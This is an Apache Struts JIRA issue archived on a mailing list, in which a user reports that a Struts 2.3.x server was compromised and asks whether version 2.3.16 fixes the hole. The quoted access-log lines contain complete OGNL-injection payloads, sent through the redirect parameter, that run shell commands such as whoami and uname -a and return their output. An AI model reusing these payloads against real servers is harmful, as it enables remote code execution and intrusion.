struts-issues mailing list archives

Site index · List index
Message view « Date » · « Thread »
Top « Date » · « Thread »
From "Lukasz Lenart (JIRA)" <j...@apache.org>
Subject [jira] [Deleted] (WW-4304) Security issues with sturts 2.3.x
Date Wed, 19 Mar 2014 14:06:44 GMT

     [ https://issues.apache.org/jira/browse/WW-4304?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
]

Lukasz Lenart deleted WW-4304:
------------------------------


> Security issues with sturts 2.3.x
> ---------------------------------
>
>                 Key: WW-4304
>                 URL: https://issues.apache.org/jira/browse/WW-4304
>             Project: Struts 2
>          Issue Type: Bug
>         Environment: Ubuntu on microsoft windows azure
>            Reporter: RAJA SEKHAR
>              Labels: security
>   Original Estimate: 96h
>  Remaining Estimate: 96h
>
> Hi 
> I have analyzed the logs for SMA and i found out the following in log files
> 202.82.228.91 - - [24/Feb/2014:04:31:49 +0000] "GET /testimonialsList.action?redirect:$%7B%23p%3Dnew%20java.lang.String(new+sun.misc.BASE64Decoder().decodeBuffer("d2hvYW1p")),%20%23a%3d%28new%20java.lang.ProcessBuilder%28%23p.split(%22%20%22)%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char%5B50000%5D,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23arr%3Dnew%20int[1],%23len%3D%23d.read%28%23e%29,%20%23arr.{(%23len%3D%3D-1)%3F%23{%23len%3D-1}%3A{%23matt.getWriter%28%29.print%28new%20java.lang.String%28%23e,0,%23len%29%29,%23len%3D%23d.read%28%23e%29}},%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29%7D
HTTP/1.1" 200 15
> 202.82.228.91 - - [24/Feb/2014:04:31:49 +0000] "GET /testimonialsList.action?redirect:$%7B%23p%3Dnew%20java.lang.String(new+sun.misc.BASE64Decoder().decodeBuffer("dW5hbWUgLWE%3D")),%20%23a%3d%28new%20java.lang.ProcessBuilder%28%23p.split(%22%20%22)%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char%5B50000%5D,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23arr%3Dnew%20int[100],%23len%3D%23d.read%28%23e%29,%23arr.{(%23len%3D%3D-1)%3F%23{%23len%3D-1}%3A{%23matt.getWriter%28%29.print%28new%20java.lang.String%28%23e,0,%23len%29%29,%23len%3D%23d.read%28%23e%29}},%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29%7D
HTTP/1.1" 200 115
> I have seen these entries in log file. Through this intruder has hacked the system by
finding the issue name /passwords etc and he has taken control of the system.
> By this he created files in ROOT directory , and he was running DOS attacks on the system.
This led to large data transfer and there was a bill of 1000$ was generated to our customer.
I found that the issue is fixed in version 2.3.16. 
> I have following questions 
> 1) are these issues are fixed in 2.3.16.
> 2) Since the root cause of the problem is with struts -2.3.1.1 , do you reimburse the
bill.
> Please help us resolving this use



--
This message was sent by Atlassian JIRA
(v6.2#6252)

Mime
View raw message